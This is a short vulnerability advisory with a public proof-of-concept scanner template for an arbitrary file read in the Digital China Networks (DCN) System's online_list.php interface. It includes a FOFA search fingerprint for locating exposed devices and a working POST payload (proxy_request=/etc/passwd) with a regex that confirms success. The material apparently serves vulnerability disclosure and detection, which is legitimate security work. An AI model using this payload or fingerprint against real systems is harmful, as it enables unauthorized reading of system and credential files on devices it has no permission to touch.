漏洞描述
Digital China Networks (DCN) System online_list.php interface has an arbitrary file read vulnerability.
An attacker can read arbitrary files by sending a specially crafted POST request.
FOFA: body="style/blue/css/dcn_ui.css"
dcn-online-list-fileread: DCN System Online_list.php Arbitrary File Read
PoC代码[已公开]
id: dcn-online-list-fileread
info:
name: DCN System Online_list.php Arbitrary File Read
author: ZacharyZcR
severity: high
verified: true
description: |
Digital China Networks (DCN) System online_list.php interface has an arbitrary file read vulnerability.
An attacker can read arbitrary files by sending a specially crafted POST request.
FOFA: body="style/blue/css/dcn_ui.css"
reference:
- https://github.com/wy876/POC/blob/main/DCN/%E7%A5%9E%E5%B7%9E%E6%95%B0%E7%A0%81DCN%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3online_list.php%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
tags: dcn,lfi,fileread
created: 2024/12/30
rules:
r0:
request:
method: POST
path: /function/auth/user/online_list.php
body: proxy_request=/etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()